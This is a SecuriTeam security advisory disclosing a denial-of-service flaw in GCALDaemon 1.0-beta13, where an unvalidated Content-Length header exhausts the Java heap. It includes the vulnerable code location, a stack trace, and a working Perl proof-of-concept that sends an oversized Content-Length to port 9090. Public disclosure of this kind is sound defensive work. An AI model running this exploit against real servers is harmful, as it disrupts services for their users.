[NEWS] GCALDaemon DoS



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



GCALDaemon DoS
------------------------------------------------------------------------


SUMMARY

<http://gcaldaemon.sourceforge.net/> GCALDaemon is "an OS-independent
Java program that offers two-way synchronization between Google Calendar
and various iCalendar compatible calendar applications. GCALDaemon is
primarily designed as a calendar synchronizer but it can also be used as a
Gmail notifier, Address Book importer, Gmail terminal and RSS feed
converter".

Sunbird/Kontact/Firefox/ThunderBird/Mozilla Calendar all share calendars
over HTTP, by uploading their file via an HTTP PUT and getting/refreshing
their calendar with an HTTP GET. The GCALDaemon's built-in HTTP server
keeps this HTTP messages in sync with a specified Google Calendar. An
input validation flaw permits to craft an HTTP request with an abnormal
content-length value; this malformed request could trigger a denial of
service that arises from a Java out of memory fatal error.

DETAILS

Vulnerable Systems:
* GALDaemon version 1.0-beta13

Using a crafted HTTP request, an attacker could trigger a denial of
service that arises from a java.lang.OutOfMemoryError when the Java heap
space is overfilled. In the file
"org/gcaldaemon/core/http/HTTPListener.java", the GCALDaemon's built-in
HTTP server parses the HTTP request and the HTTP header parameters without
validation checkpoints. In the line of code
"490:org/gcaldaemon/core/http/HTTPListener.java" the "Content-Length"
header parameter is used to create a new byte array; when the size of this
structure is big enough, it could trigger a Java fatal error that blocks
the HTTP daemon:

Exception in thread "HTTP listener" java.lang.OutOfMemoryError: Java heap
space
at
org.gcaldaemon.core.http.HTTPListener.readRequest(HTTPListener.java:490)
at
org.gcaldaemon.core.http.HTTPListener.run(HTTPListener.java:167)

Exploit:
The provided proof-of-concept can trigger the issue.

--------------------------------------------
#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port,
PeerProto => 'tcp')
or die "error: $!\n";
print "GCALDaemom DoS Expoit\n";
print "Just 4 seconds...\n";
sleep 4;
$sock->send("GET / HTTP/1.1\r\n");
$sock->send("Content-Length: 1000000000\r\n\r\n");
$sock->close;
print "\n\nNo more sync!\n";
--------------------------------------------


ADDITIONAL INFORMATION

The information has been provided by
<mailto:luca.carettoni@xxxxxxxxxxxxxxxx> Luca Carettoni.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • [UNIX] wget and curl NTLM Username Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... package for retrieving files using HTTP, HTTPS and FTP, the most ... curl supports HTTPS certificates, HTTP POST, ... The vulnerability specifically exists due to insufficient bounds checking ...
    (Securiteam)
  • [UNIX] Kaffeine Media Player Content-Type Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A buffer overflow attack is possible in kaffeine by supplying a RealAudio ... http: content type = 'text/plain;' ... Previous frame inner to this frame ...
    (Securiteam)
  • [NEWS] SAP WebAS URL Manipulation
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SAP Web Application Server is the application platform of SAP ... Also the vulnerability may aid an attacker in manipulating the way a ... http request URL, followed by the characters to be inserted, replacing all ...
    (Securiteam)
  • [UNIX] cURL Buffer Overflow (tftp URL)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... cURL Buffer Overflow (tftp URL) ... curl supports HTTPS certificates, HTTP POST, HTTP ...
    (Securiteam)
  • [ANN] Unified I/O for Java 2.1 released
    ... Unified I/O is a high performance Java library that allows random access ... files, arrays, streams (even over HTTP), and gives a clear difference ... Read/write direct from/into primitive arrays ...
    (comp.lang.java.programmer)